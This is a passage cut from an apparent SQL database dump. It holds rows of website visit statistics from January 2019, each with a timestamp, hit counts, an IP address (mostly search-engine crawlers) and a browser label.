'other'),(368059,1547117086,1,1,0,0,'91.196.178.65','firefox'),(368060,1547117095,2,2,0,0,'91.196.178.67','chrome'),(368061,1547117117,4,4,0,0,'216.244.66.241','other'),(368062,1547117177,1,1,0,0,'46.229.168.148','other'),(368063,1547117680,1,1,0,0,'66.249.66.44','chrome'),(368064,1547117819,1,1,0,0,'66.249.66.42','chrome'),(368065,1547118045,1,1,0,0,'216.244.66.241','other'),(368066,1547118066,1,1,0,0,'37.53.233.139','chrome'),(368067,1547118348,1,1,0,0,'54.36.149.19','other'),(368068,1547118502,1,1,0,0,'66.249.66.154','chrome'),(368069,1547118518,1,1,0,0,'66.249.66.152','chrome'),(368070,1547118877,1,1,0,0,'54.36.148.173','other'),(368071,1547118979,7,7,0,0,'216.244.66.241','other'),(368072,1547119257,2,2,0,0,'66.249.66.156','chrome'),(368073,1547119258,1,1,0,0,'66.249.66.220','chrome'),(368074,1547119475,1,1,0,0,'54.36.148.75','other'),(368075,1547119612,1,1,0,0,'46.229.168.148','other'),(368076,1547119719,1,1,0,0,'54.36.149.74','other'),(368077,1547119832,1,1,0,0,'157.55.39.125','other'),(368078,1547119838,1,1,0,0,'66.249.66.154','chrome'),(368079,1547119845,1,1,0,0,'37.53.123.48','chrome'),(368080,1547119953,1,1,0,0,'54.36.148.56','other'),(368081,1547119976,1,1,0,0,'54.36.149.38','other'),(368082,1547120009,1,1,0,0,'54.36.148.195','other'),(368083,1547120084,3,3,0,0,'216.244.66.241','other'),(368084,1547120092,1,1,0,0,'54.36.148.30','other'),(368085,1547120278,1,1,0,0,'66.249.66.220','chrome'),(368086,1547120292,1,1,0,0,'207.46.13.52','other'),(368087,1547120299,1,1,0,0,'54.36.148.112','other'),(368088,1547120326,1,1,0,0,'66.249.66.152','chrome'),(368089,1547120407,1,1,0,0,'66.249.66.201','chrome'),(368090,1547120408,1,1,0,0,'66.249.66.218','chrome'),(368091,1547120468,1,1,0,0,'66.249.66.21','chrome'),(368092,1547120648,1,1,0,0,'54.36.148.223','other'),(368093,1547121085,1,1,0,0,'54.36.148.127','other'),(368094,1547121104,1,1,0,0,'46.229.168.152','other'),(368095,1547121348,1,1,0,0,'54.36.148.22','other'),(368096,1547121436,1,1,0,0,'54.36.148.122','other'),(368097,1547121567,1,1,0,0,'46.229.168.146','other'),(368098,1547121787,6,6,0,0,'216.244.66.241','other'),(368099,1547121850,1,1,0,0,'54.36.148.17','other'),(368100,1547121872,1,1,0,0,'54.36.148.152','other'),(368101,1547121980,1,1,0,0,'54.36.149.75','other'),(368102,1547121994,1,1,0,0,'185.211.245.167','chrome'),(368103,1547122066,1,1,0,0,'141.8.142.103','other'),(368104,1547122165,1,1,0,0,'66.249.66.204','chrome'),(368105,1547122397,1,1,0,0,'54.36.148.94','other'),(368106,1547122872,1,1,0,0,'54.36.149.26','other'),(368107,1547123130,1,1,0,0,'46.229.168.143','other'),(368108,1547123366,2,2,0,0,'91.196.178.77','firefox'),(368109,1547123702,1,1,0,0,'54.36.149.68','other'),(368110,1547123949,1,1,0,0,'5.45.207.79','other'),(368111,1547124600,13,13,0,0,'216.244.66.241','other'),(368112,1547124633,1,1,0,0,'8.29.198.25','other'),(368113,1547124665,1,1,0,0,'54.36.148.27','other'),(368114,1547124686,1,1,0,0,'54.36.149.25','other'),(368115,1547124856,1,1,0,0,'54.36.148.194','other'),(368116,1547124947,2,2,0,0,'91.196.178.67','chrome'),(368117,1547125174,1,1,0,0,'54.36.148.241','other'),(368118,1547125846,1,1,0,0,'54.36.148.13','other'),(368119,1547125879,2,2,0,0,'91.124.182.170','firefox'),(368120,1547125909,1,1,0,0,'8.29.198.25','other'),(368121,1547125920,1,1,0,0,'66.249.66.156','chrome'),(368122,1547125986,2,2,0,0,'91.196.178.67','chrome'),(368123,1547126256,1,1,0,0,'54.36.148.40','other'),(368124,1547126310,1,1,0,0,'54.36.148.143','other'),(368125,1547126345,1,1,0,0,'216.244.66.241','other'),(368126,1547126539,1,1,0,0,'54.36.148.36','other'),(368127,1547126592,1,1,0,0,'66.102.9.62','chrome'),(368128,1547126693,1,1,0,0,'66.249.66.155','chrome'),(368129,1547126694,2,2,0,0,'66.249.66.154','chrome'),(368130,1547126754,1,1,0,0,'66.249.66.220','chrome'),(368131,1547126823,1,1,0,0,'54.36.148.169','other'),(368132,1547127052,1,1,0,0,'54.36.149.2','other'),(368133,1547127064,1,1,0,0,'66.249.66.21','chrome'),(368134,1547127163,1,1,0,0,'54.36.148.129','other'),(368135,1547127201,1,1,0,0,'54.36.148.123','other'),(368136,1547127311,1,1,0,0,'46.229.168.145','other'),(368137,1547127429,4,4,0,0,'216.244.66.241','other'),(368138,1547127766,1,1,0,0,'66.249.66.155','chrome'),(368140,1547128088,1,1,0,0,'66.249.66.222','chrome'),(368141,1547128152,2,2,0,0,'77.111.244.213','chrome'),(368142,1547128233,1,1,0,0,'46.229.168.144','other'),(368143,1547128235,1,1,0,0,'46.229.168.143','other'),(368144,1547128470,1,1,0,0,'54.36.149.53','other'),(368145,1547128630,1,1,0,0,'66.249.66.27','chrome'),(368146,1547128631,1,1,0,0,'66.249.66.21','chrome'),(368147,1547128776,1,1,0,0,'66.249.66.218','chrome'),(368148,1547128868,1,1,0,0,'54.36.148.71','other'),(368149,1547128966,2,2,0,0,'66.249.66.154','chrome'),(368150,1547129209,1,1,0,0,'54.36.149.80','other'),(368151,1547129759,1,1,0,0,'46.229.168.140','other'),(368152,1547129824,1,1,0,0,'54.36.148.170','other'),(368153,1547130039,1,1,0,0,'178.154.244.11','other'),(368154,1547130066,1,1,0,0,'207.46.13.172','other'),(368155,1547130077,1,1,0,0,'141.8.142.103','other'),(368156,1547130097,1,1,0,0,'130.180.217.123','chrome'),(368157,1547130243,1,1,0,0,'207.46.13.193','other'),(368158,1547130245,7,7,0,0,'216.244.66.241','other'),(368159,1547130319,3,3,0,0,'66.249.66.156','chrome'),(368160,1547130457,2,2,0,0,'5.45.207.79','other'),(368161,1547130488,1,1,0,0,'54.36.148.212','other'),(368162,1547130535,1,1,0,0,'54.36.148.173','other'),(368163,1547130585,3,3,0,0,'91.196.178.67','chrome'),(368164,1547130587,1,1,0,0,'54.36.148.206','other'),(368165,1547130706,1,1,0,0,'54.36.148.46','other'),(368166,1547130821,1,1,0,0,'54.36.148.108','other'),(368167,1547130888,1,1,0,0,'87.250.224.65','other'),(368168,1547131042,1,1,0,0,'66.249.66.154','chrome'),(368169,1547131417,3,3,0,0,'216.244.66.241','other'),(368170,1547131581,1,1,0,0,'5.45.207.79','other'),(368171,1547131759,1,1,0,0,'54.36.148.18','other'),(368172,1547131929,1,1,0,0,'54.36.148.144','other'),(368173,1547131935,1,1,0,0,'54.36.148.11','other'),(368174,1547132020,1,1,0,0,'54.36.149.75','other'),(368175,1547132050,2,2,0,0,'91.196.178.134','firefox'),(368176,1547132551,1,1,0,0,'54.36.148.120','other'),(368177,1547132573,1,1,0,0,'54.36.148.28','other'),(368178,1547132707,2,2,0,0,'94.179.246.96','firefox'),(368179,1547132801,1,1,0,0,'54.36.148.108','other'),(368180,1547132831,2,2,0,0,'91.196.178.67','chrome'),(368181,1547132881,1,1,0,0,'54.36.148.217','other'),(368182,1547133099,6,6,0,0,'216.244.66.241','other'),(368183,1547133593,2,2,0,0,'66.249.66.152','chrome'),(368184,1547133765,1,1,0,0,'66.249.66.157','chrome'),(368186,1547133788,1,1,0,0,'54.36.148.103','other'),(368187,1547133798,1,1,0,0,'54.36.148.169','other'),(368188,1547133954,1,1,0,0,'54.36.149.101','other'),(368189,1547134049,1,1,0,0,'54.36.149.71','other'),(368190,1547134334,1,1,0,0,'54.36.148.186','other'),(368191,1547134369,1,1,0,0,'176.105.4.149','other'),(368192,1547134515,2,2,0,0,'216.244.66.241','other'),(368193,1547134793,1,1,0,0,'66.249.66.155','chrome'),(368194,1547134794,1,1,0,0,'66.249.66.154','chrome'),(368195,1547134870,1,1,0,0,'66.249.66.156','chrome'),(368196,1547134871,1,1,0,0,'66.249.66.152','chrome'),(368197,1547134940,1,1,0,0,'178.154.244.11','other'),(368198,1547135068,1,1,0,0,'207.46.13.63','other'),(368199,1547135233,1,1,0,0,'54.36.148.118','other'),(368200,1547135284,1,1,0,0,'66.249.66.25','chrome'),(368201,1547135285,1,1,0,0,'66.249.66.19','chrome'),(368202,1547135486,1,1,0,0,'8.29.198.26','other'),(368203,1547135570,1,1,0,0,'54.36.148.57','other'),(368204,1547135783,1,1,0,0,'66.249.66.155','chrome'),(368206,1547135795,1,1,0,0,'207.46.13.172','other'),(368207,1547135859,1,1,0,0,'54.36.148.156','other'),(368208,1547135909,12,12,0,0,'216.244.66.241','other'),(368209,1547135941,1,1,0,0,'46.229.168.152','other'),(368210,1547135949,1,1,0,0,'54.36.148.162','other'),(368211,1547135989,1,1,0,0,'13.66.139.0','other'),(368212,1547136435,1,1,0,0,'66.249.66.156','chrome'),(368213,1547136751,1,1,0,0,'8.29.198.27','other'),(368214,1547136929,1,1,0,0,'54.36.148.43','other'),(368215,1547137167,1,1,0,0,'13.57.233.99','chrome'),(368216,1547137372,1,1,0,0,'54.36.148.158','other'),(368217,1547137483,1,1,0,0,'54.36.148.53','other'),(368218,1547137573,1,1,0,0,'54.36.148.241','other'),(368219,1547137666,1,1,0,0,'54.36.148.129','other'),(368220,1547137782,1,1,0,0,'54.36.149.71','other'),(368221,1547137852,1,1,0,0,'66.249.66.26','chrome'),(368222,1547137853,1,1,0,0,'66.249.66.21','chrome'),(368223,1547137902,1,1,0,0,'95.163.255.108','other'),(368224,1547137971,1,1,0,0,'95.163.255.115','other'),(368225,1547138004,1,1,0,0,'54.36.149.13','other'),(368226,1547138051,1,1,0,0,'95.163.255.104','other'),(368227,1547138112,1,1,0,0,'54.36.149.24','other'),(368228,1547138183,1,1,0,0,'95.163.255.114','other'),(368229,1547138482,1,1,0,0,'54.36.148.149','other'),(368230,1547138631,1,1,0,0,'54.36.148.229','other'),(368231,1547138696,1,1,0,0,'95.108.213.4','other'),(368232,1547138698,1,1,0,0,'5.45.207.79','other'),(368233,1547138716,9,9,0,0,'216.244.66.241','other'),(368234,1547138976,1,1,0,0,'54.36.149.60','other'),(368235,1547138979,1,1,0,0,'66.249.66.155','chrome'),(368236,1547138980,1,1,0,0,'66.249.66.154','chrome'),(368237,1547139054,2,2,0,0,'37.73.228.226','chrome'),(368238,1547139627,2,2,0,0,'216.244.66.241','other'),(368239,1547139816,1,1,0,0,'66.249.66.152','chrome'),(368240,1547140310,1,1,0,0,'54.36.148.95','other'),(368241,1547140571,1,1,0,0,'216.244.66.241','other'),(368242,1547140811,1,1,0,0,'54.36.148.178','other'),(368243,1547140959,1,1,0,0,'46.133.158.210','chrome'),(368244,1547141058,1,1,0,0,'46.229.168.145','other'),(368245,1547141060,1,1,0,0,'46.229.168.143','other'),(368246,1547141184,2,2,0,0,'128.68.208.106','firefox'),(368247,1547141270,2,2,0,0,'91.196.178.167','chrome'),(368248,1547141489,2,2,0,0,'40.77.167.82','other'),(368249,1547141528,2,2,0,0,'46.211.121.21','chrome'),(368250,1547141542,6,6,0,0,'216.244.66.241','other'),(368251,1547141547,1,1,0,0,'95.163.255.117','other'),(368252,1547141553,1,1,0,0,'54.36.149.34','other'),(368253,1547141621,1,1,0,0,'95.163.255.115','other'),(368254,1547141774,1,1,0,0,'207.46.13.63','other'),(368255,1547141845,1,1,0,0,'54.36.148.92','other'),(368256,1547141869,1,1,0,0,'54.36.149.49','other'),(368257,1547142045,1,1,0,0,'54.36.148.129','other'),(368258,1547142069,1,1,0,0,'54.36.148.237','other'),(368259,1547142086,1,1,0,0,'54.36.148.248','other'),(368260,1547142339,1,1,0,0,'95.163.255.103','other'),(368261,1547142552,1,1,0,0,'54.36.148.254','other'),(368262,1547142941,1,1,0,0,'54.36.148.199','other'),(368263,1547143132,1,1,0,0,'95.221.138.101','msie'),(368264,1547143326,1,1,0,0,'54.36.149.90','other'),(368265,1547143458,1,1,0,0,'95.163.255.112','other'),(368266,1547143463,1,1,0,0,'216.244.66.241','other'),(368267,1547143745,1,1,0,0,'46.229.168.129','other'),(368268,1547143997,1,1,0,0,'54.36.148.33','other'),(368269,1547144203,1,1,0,0,'157.55.39.245','other'),(368270,1547144372,3,3,0,0,'216.244.66.241','other'),(368271,1547144611,1,1,0,0,'54.36.149.98','other'),(368272,1547144691,1,1,0,0,'54.36.148.137','other'),(368273,1547144815,1,1,0,0,'54.36.148.57','other'),(368274,1547145214,1,1,0,0,'54.36.148.88','other'),(368275,1547145909,1,1,0,0,'54.36.148.23','other'),(368276,1547146251,1,1,0,0,'46.229.168.146','other'),(368277,1547146321,1,1,0,0,'8.29.198.25','other'),(368278,1547146375,1,1,0,0,'40.77.167.82','other'),(368279,1547146528,1,1,0,0,'40.77.167.38','other'),(368280,1547146768,1,1,0,0,'54.36.149.87','other'),(368281,1547146958,2,2,0,0,'87.250.224.65','other'),(368282,1547146967,1,1,0,0,'54.36.149.85','other'),(368283,1547147173,12,12,0,0,'216.244.66.241','other'),(368284,1547147190,1,1,0,0,'54.36.149.5','other'),(368285,1547147247,2,2,0,0,'46.211.128.64','chrome'),(368286,1547147452,1,1,0,0,'178.154.244.11','other'),(368287,1547147456,1,1,0,0,'95.108.213.4','other'),(368288,1547147509,1,1,0,0,'54.36.148.53','other'),(368289,1547147595,1,1,0,0,'8.29.198.25','other'),(368290,1547147621,1,1,0,0,'5.45.207.19','other'),(368291,1547147710,1,1,0,0,'141.8.142.103','other'),(368292,1547147714,1,1,0,0,'95.163.255.112','other'),(368293,1547147726,1,1,0,0,'46.229.168.141','other'),(368294,1547147728,1,1,0,0,'46.229.168.137','other'),(368295,1547147888,2,2,0,0,'91.196.178.75','firefox'),(368296,1547148099,2,2,0,0,'95.163.255.114','other'),(368297,1547148144,2,2,0,0,'216.244.66.241','other'),(368298,1547148161,1,1,0,0,'46.211.128.64','chrome'),(368299,1547148307,1,1,0,0,'54.36.148.240','other'),(368300,1547148371,1,1,0,0,'180.76.15.148','other'),(368301,1547148372,1,1,0,0,'180.76.15.11','other'),(368302,1547148434,1,1,0,0,'54.36.148.54','other'),(368303,1547148498,1,1,0,0,'95.163.255.109','other'),(368304,1547148612,1,1,0,0,'95.163.255.105','other'),(368305,1547148688,2,2,0,0,'95.163.255.115','other'),(368306,1547148715,1,1,0,0,'54.36.148.17','other'),(368307,1547148776,1,1,0,0,'95.163.255.106','other'),(368308,1547148870,1,1,0,0,'46.229.168.129','other'),(368309,1547149060,2,2,0,0,'216.244.66.241','other'),(368310,1547149290,1,1,0,0,'54.36.149.42','other'),(368311,1547149292,1,1,0,0,'46.211.128.64','chrome'),(368312,1547149311,1,0,1,0,'66.249.66.26',''),(368313,1547149314,1,0,1,0,'66.249.66.19',''),(368314,1547149452,1,1,0,0,'54.36.148.158','other'),(368315,1547149520,1,1,0,0,'141.8.142.103','other'),(368316,1547149523,1,1,0,0,'37.9.113.148','other'),(368318,1547149524,1,1,0,0,'178.154.244.11','other'),(368319,1547149961,9,9,0,0,'216.244.66.241','other'),(368320,1547150212,1,1,0,0,'54.36.148.169','other'),(368321,1547150578,1,1,0,0,'95.163.255.155','other'),(368322,1547150609,1,1,0,0,'209.17.96.218','other'),(368323,1547150612,1,1,0,0,'95.163.255.164','other'),(368324,1547150789,1,1,0,0,'130.180.217.68','chrome'),(368325,1547150857,1,1,0,0,'54.36.149.45','other'),(368326,1547151321,1,1,0,0,'54.36.148.246','other'),(368327,1547151484,1,1,0,0,'54.36.148.136','other'),(368328,1547152009,1,1,0,0,'54.36.148.188','other'),(368329,1547152203,1,1,0,0,'54.36.149.47','other'),(368330,1547152599,1,1,0,0,'54.36.148.115','other'),(368331,1547152760,5,5,0,0,'216.244.66.241','other'),(368332,1547152828,2,2,0,0,'52.53.201.78','chrome'),(368333,1547152929,1,1,0,0,'46.229.168.137','other'),(368334,1547152930,1,1,0,0,'46.229.168.153','other'),(368335,1547153204,1,1,0,0,'54.36.148.114','other'),(368336,1547153763,2,2,0,0,'5.45.207.19','other'),(368337,1547153939,1,1,0,0,'54.36.148.111','other'),(368338,1547154252,1,1,0,0,'216.244.66.241','other'),(368339,1547154792,1,1,0,0,'5.45.207.79','other'),(368340,1547154876,1,1,0,0,'46.229.168.146','other'),(368341,1547154942,1,1,0,0,'54.36.148.129','other'),(368342,1547155009,1,1,0,0,'54.36.148.65','other'),(368343,1547155543,13,13,0,0,'216.244.66.241','other'),(368344,1547156146,1,1,0,0,'54.36.149.50','other'),(368345,1547156746,1,1,0,0,'54.36.149.58','other'),(368346,1547156857,1,1,0,0,'40.77.167.103','other'),(368347,1547156884,1,1,0,0,'46.229.168.153','other'),(368348,1547157168,1,1,0,0,'8.29.198.26','other'),(368349,1547157214,1,1,0,0,'66.249.66.152','chrome'),(368350,1547157370,1,1,0,0,'54.36.148.146','other'),(368351,1547157518,2,2,0,0,'54.36.148.142','other'),(368352,1547157524,1,1,0,0,'54.36.148.205','other'),(368353,1547157842,1,1,0,0,'157.55.39.245','other'),(368354,1547158315,1,1,0,0,'207.46.13.168','other'),(368355,1547158345,7,7,0,0,'216.244.66.241','other'),(368356,1547158430,1,1,0,0,'8.29.198.26','other'),(368357,1547158622,1,1,0,0,'54.36.148.254','other'),(368358,1547158658,1,1,0,0,'54.36.148.68','other'),(368359,1547158783,1,1,0,0,'40.77.167.103','other'),(368360,1547159215,1,1,0,0,'54.36.149.36','other'),(368361,1547159550,1,1,0,0,'37.9.113.103','other'),(368362,1547159785,1,1,0,0,'37.73.130.37','chrome'),(368363,1547159835,1,1,0,0,'141.8.142.103','other'),(368364,1547159894,1,1,0,0,'54.36.148.59','other'),(368365,1547159961,1,1,0,0,'216.244.66.241','other'),(368366,1547159988,1,1,0,0,'54.36.148.77','other'),(368367,1547160953,1,1,0,0,'46.229.168.150','other'),(368368,1547161130,10,10,0,0,'216.244.66.241','other'),(368369,1547161858,1,1,0,0,'54.36.148.109','other'),(368370,1547162587,2,2,0,0,'216.244.66.241','other'),(368371,1547162809,1,1,0,0,'54.36.148.204','other'),(368372,1547162998,1,1,0,0,'54.36.148.80','other'),(368373,1547163125,1,1,0,0,'54.36.148.61','other'),(368374,1547163136,1,1,0,0,'54.36.148.21','other'),(368375,1547163315,1,1,0,0,'46.229.168.154','other'),(368376,1547163522,1,1,0,0,'54.36.149.14','other'),(368377,1547163594,1,1,0,0,'40.77.167.86','other'),(368378,1547163937,10,10,0,0,'216.244.66.241','other'),(368379,1547164000,1,1,0,0,'88.99.2.203','other'),(368380,1547164294,1,1,0,0,'207.46.13.168','other'),(368381,1547164316,1,1,0,0,'66.249.66.22','chrome'),(368382,1547164498,1,1,0,0,'54.36.148.80','other'),(368383,1547164545,1,1,0,0,'40.77.167.103','other'),(368384,1547164583,1,1,0,0,'46.229.168.150','other'),(368385,1547164616,1,1,0,0,'54.36.148.217','other'),(368386,1547164933,2,2,0,0,'216.244.66.241','other'),(368387,1547165075,1,1,0,0,'54.36.149.79','other'),(368388,1547165233,3,3,0,0,'54.165.59.7','other'),(368389,1547165309,1,1,0,0,'54.36.149.15','other'),(368390,1547166076,1,1,0,0,'54.36.148.255','other'),(368391,1547166134,1,1,0,0,'54.36.148.175','other'),(368392,1547166691,1,1,0,0,'54.36.149.86','other'),(368393,1547166693,4,4,0,0,'216.244.66.241','other'),(368394,1547166784,1,1,0,0,'54.36.149.6','other'),(368395,1547166833,1,1,0,0,'40.77.167.86','other'),(368396,1547167242,2,2,0,0,'207.46.13.24','other'),(368397,1547167787,2,2,0,0,'216.244.66.241','other'),(368398,1547167890,1,1,0,0,'40.77.167.86','other'),(368399,1547167929,1,1,0,0,'54.36.148.126','other'),(368400,1547168015,1,1,0,0,'8.29.198.26','other'),(368401,1547168278,1,1,0,0,'54.36.148.117','other'),(368402,1547168295,1,1,0,0,'66.249.66.154','chrome'),(368403,1547168298,1,1,0,0,'66.249.66.156','chrome'),(368404,1547168299,19,19,0,0,'66.249.66.152','chrome'),(368405,1547168553,1,1,0,0,'46.229.168.137','other'),(368406,1547168692,6,6,0,0,'216.244.66.241','other'),(368407,1547168936,1,1,0,0,'54.36.148.77','other'),(368408,1547169128,1,1,0,0,'54.36.148.159','other'),(368409,1547169169,1,1,0,0,'54.36.149.97','other'),(368410,1547169186,1,1,0,0,'54.36.148.160','other'),(368411,1547169257,1,1,0,0,'8.29.198.27','other'),(368412,1547169282,1,1,0,0,'54.36.148.213','other'),(368413,1547169291,1,1,0,0,'54.36.149.101','other'),(368414,1547169410,1,1,0,0,'54.36.148.150','other'),(368415,1547169433,2,2,0,0,'54.36.149.3','other'),(368416,1547169600,5,5,0,0,'216.244.66.241','other'),(368417,1547170016,1,1,0,0,'40.77.167.86','other'),(368418,1547170407,1,1,0,0,'54.36.148.126','other'),(368419,1547170427,1,1,0,0,'54.36.149.67','other'),(368420,1547170648,1,1,0,0,'54.36.148.54','other'),(368421,1547170708,1,1,0,0,'66.249.66.152','chrome'),(368422,1547170768,1,1,0,0,'54.36.148.143','other'),(368423,1547170777,1,1,0,0,'207.46.13.30','other'),(368424,1547170815,1,1,0,0,'54.36.148.252','other'),(368425,1547170888,1,1,0,0,'54.36.148.16','other'),(368426,1547170932,1,1,0,0,'66.249.66.155','chrome'),(368428,1547170953,1,1,0,0,'216.244.66.241','other'),(368429,1547170981,1,1,0,0,'54.36.148.24','other'),(368430,1547170986,1,1,0,0,'54.36.148.139','other'),(368431,1547171200,1,1,0,0,'88.99.2.203','other'),(368432,1547171312,1,1,0,0,'54.36.148.158','other'),(368433,1547172252,7,7,0,0,'216.244.66.241','other'),(368434,1547172390,1,1,0,0,'178.154.244.11','other'),(368435,1547172494,1,1,0,0,'54.36.149.68','other'),(368436,1547172831,1,1,0,0,'66.249.66.25','chrome'),(368437,1547172832,1,1,0,0,'66.249.66.21','chrome'),(368438,1547172997,1,1,0,0,'54.36.148.237','other'),(368439,1547173375,1,1,0,0,'46.229.168.133','other'),(368440,1547173378,1,1,0,0,'66.249.66.22','chrome'),(368441,1547173387,1,1,0,0,'66.249.66.152','chrome'),(368442,1547173609,2,2,0,0,'66.249.66.156','chrome'),(368443,1547173839,2,2,0,0,'216.244.66.241','other'),(368444,1547173946,1,1,0,0,'54.36.148.133','other'),(368445,1547174339,1,1,0,0,'54.36.149.58','other'),(368446,1547174456,2,2,0,0,'54.212.65.3','chrome'),(368447,1547174584,1,1,0,0,'46.229.168.129','other'),(368448,1547174753,1,1,0,0,'54.36.148.106','other'),(368449,1547174803,2,2,0,0,'5.45.207.19','other'),(368450,1547174978,1,1,0,0,'54.36.148.50','other'),(368451,1547175032,11,11,0,0,'216.244.66.241','other'),(368452,1547175244,1,1,0,0,'54.36.149.30','other'),(368453,1547175295,1,1,0,0,'54.36.149.57','other'),(368454,1547175379,1,1,0,0,'54.36.149.62','other'),(368455,1547175756,1,1,0,0,'207.46.13.24','other'),(368456,1547175869,1,1,0,0,'54.36.148.127','other'),(368457,1547176109,1,1,0,0,'54.36.148.215','other'),(368458,1547176369,1,1,0,0,'95.163.255.92','other'),(368459,1547176371,1,1,0,0,'95.163.255.96','other'),(368460,1547176630,3,3,0,0,'216.244.66.241','other'),(368461,1547176712,1,1,0,0,'54.36.148.122','other'),(368462,1547177574,1,1,0,0,'66.249.66.22','chrome'),(368463,1547177734,1,1,0,0,'40.77.167.113','other'),(368464,1547177804,10,10,0,0,'216.244.66.241','other'),(368465,1547178505,1,1,0,0,'5.45.207.19','other'),(368466,1547178530,1,1,0,0,'54.36.148.158','other'),(368467,1547178698,1,1,0,0,'54.36.149.28','other'),(368468,1547178745,4,4,0,0,'216.244.66.241','other'),(368469,1547178760,5,5,0,0,'93.179.68.108','chrome'),(368470,1547178837,1,1,0,0,'46.229.168.136','other'),(368471,1547178844,1,1,0,0,'54.36.148.30','other'),(368472,1547178866,1,1,0,0,'8.29.198.26','other'),(368473,1547178949,1,1,0,0,'54.36.149.106','other'),(368474,1547179078,1,1,0,0,'66.249.66.19','chrome'),(368475,1547179238,1,1,0,0,'54.36.149.36','other'),(368476,1547179312,1,1,0,0,'54.36.148.113','other'),(368477,1547179687,3,3,0,0,'216.244.66.241','other'),(368478,1547179765,1,1,0,0,'54.36.148.150','other'),(368479,1547179894,1,1,0,0,'54.36.148.139','other'),(368480,1547179995,1,1,0,0,'46.229.168.132','other'),(368481,1547180030,2,2,0,0,'95.108.213.4','other'),(368482,1547180034,1,1,0,0,'54.36.148.156','other'),(368483,1547180087,1,1,0,0,'8.29.198.26','other'),(368484,1547180158,1,1,0,0,'178.154.244.11','other'),(368485,1547180609,7,7,0,0,'216.244.66.241','other'),(368486,1547180886,1,1,0,0,'66.249.66.154','chrome'),(368487,1547181101,1,1,0,0,'66.249.66.21','chrome'),(368488,1547181506,1,1,0,0,'54.36.149.50','other'),(368489,1547181892,1,1,0,0,'54.36.148.212','other'),(368490,1547182008,1,1,0,0,'54.36.148.246','other'),(368491,1547182331,1,1,0,0,'54.36.148.11','other'),(368492,1547182408,1,1,0,0,'157.55.39.97','other'),(368493,1547182531,1,1,0,0,'46.229.168.135','other'),(368494,1547182549,1,1,0,0,'37.204.142.87','msie'),(368495,1547182557,1,1,0,0,'54.36.148.185','other'),(368496,1547182921,1,1,0,0,'66.249.66.21','chrome'),(368497,1547183246,1,1,0,0,'54.36.148.182','other'),(368498,1547183350,9,9,0,0,'216.244.66.241','other'),(368499,1547183715,1,1,0,0,'157.55.39.97','other'),(368500,1547184025,1,1,0,0,'54.36.148.45','other'),(368501,1547184310,1,1,0,0,'54.36.148.194','other'),(368502,1547184721,1,1,0,0,'51.255.65.46','other'),(368503,1547184988,1,1,0,0,'54.36.148.238','other'),(368504,1547185348,1,1,0,0,'54.36.149.68','other'),(368505,1547185367,1,1,0,0,'40.77.167.204','other'),(368506,1547186002,1,1,0,0,'54.36.149.59','other'),(368507,1547186120,4,4,0,0,'216.244.66.241','other'),(368508,1547186609,2,2,0,0,'109.70.100.21','other'),(368509,1547186663,1,1,0,0,'40.77.167.74','other'),(368510,1547186900,1,1,0,0,'54.36.149.49','other'),(368511,1547187093,1,1,0,0,'66.249.66.39','chrome'),(368512,1547187095,1,1,0,0,'66.249.66.58','chrome'),(368513,1547187301,2,2,0,0,'46.229.168.145','other'),(368514,1547187424,4,4,0,0,'216.244.66.241','other'),(368515,1547187695,1,1,0,0,'87.250.224.47','other'),(368516,1547187713,1,1,0,0,'5.45.207.19','other'),(368517,1547187880,2,2,0,0,'5.45.207.79','other'),(368518,1547187924,1,1,0,0,'54.36.148.113','other'),(368519,1547187979,1,1,0,0,'54.36.149.26','other'),(368520,1547188037,1,1,0,0,'46.229.168.136','other'),(368521,1547188438,1,1,0,0,'54.36.148.135','other'),(368522,1547188723,1,1,0,0,'54.36.149.55','other'),(368523,1547188780,1,1,0,0,'66.249.66.156','chrome'),(368525,1547188903,5,5,0,0,'216.244.66.241','other'),(368526,1547188978,1,1,0,0,'54.36.148.94','other'),(368527,1547189108,2,2,0,0,'91.196.178.67','chrome'),(368528,1547189264,6,6,0,0,'157.55.39.97','other'),(368529,1547189273,3,3,0,0,'40.77.167.204','other'),(368530,1547189292,3,3,0,0,'40.77.167.74','other'),(368531,1547189712,1,1,0,0,'8.29.198.27','other'),(368532,1547189896,3,3,0,0,'93.179.68.108','chrome'),(368533,1547189902,1,1,0,0,'54.36.148.81','other'),(368534,1547190014,1,1,0,0,'46.229.168.147','other'),(368535,1547190314,1,1,0,0,'54.36.148.254','other'),(368536,1547190399,2,2,0,0,'216.244.66.241','other'),(368537,1547190480,1,1,0,0,'54.36.148.247','other'),(368538,1547190528,1,1,0,0,'54.36.148.179','other'),(368539,1547190548,2,2,0,0,'95.163.255.68','other'),(368540,1547190652,1,1,0,0,'46.229.168.133','other'),(368541,1547190931,1,1,0,0,'8.29.198.25','other'),(368542,1547190935,1,1,0,0,'54.36.148.100','other'),(368543,1547191184,2,2,0,0,'95.132.40.251','firefox'),(368544,1547191459,1,1,0,0,'54.36.148.115','other'),(368545,1547191704,11,11,0,0,'216.244.66.241','other'),(368546,1547191737,4,4,0,0,'91.196.178.163','chrome'),(368547,1547191818,1,1,0,0,'54.36.149.59','other'),(368548,1547191926,1,1,0,0,'54.36.149.87','other'),(368549,1547191980,1,1,0,0,'54.36.148.231','other'),(368550,1547192374,1,1,0,0,'66.249.66.152','chrome'),(368551,1547192427,2,2,0,0,'91.196.178.189','firefox'),(368552,1547192430,1,1,0,0,'54.36.148.69','other'),(368553,1547192441,1,1,0,0,'54.36.149.47','other'),(368554,1547192718,1,1,0,0,'5.45.207.79','other'),(368555,1547192800,1,1,0,0,'54.36.148.192','other'),(368556,1547192982,1,1,0,0,'95.163.255.92','other'),(368557,1547192984,1,1,0,0,'95.163.255.99','other'),(368558,1547193451,1,1,0,0,'54.36.148.191','other'),(368559,1547193616,2,2,0,0,'46.164.130.92','other'),(368560,1547193629,1,1,0,0,'54.36.148.204','other'),(368561,1547193897,1,1,0,0,'54.36.148.94','other'),(368562,1547193965,1,1,0,0,'54.36.148.242','other'),(368563,1547194088,1,1,0,0,'180.76.15.155','other'),(368564,1547194295,2,2,0,0,'95.108.213.4','other'),(368565,1547194485,3,3,0,0,'216.244.66.241','other'),(368566,1547194628,1,1,0,0,'54.36.148.122','other'),(368567,1547194630,1,1,0,0,'37.9.113.20','other'),(368568,1547194648,1,1,0,0,'5.45.207.79','other'),(368569,1547194814,2,2,0,0,'46.164.130.92','other'),(368570,1547195064,2,2,0,0,'54.165.59.7','other'),(368571,1547195454,1,1,0,0,'46.229.168.144','other'),(368572,1547195950,1,1,0,0,'54.36.148.204','other'),(368573,1547195971,1,1,0,0,'54.36.148.220','other'),(368574,1547196027,2,2,0,0,'216.244.66.241','other'),(368575,1547196405,1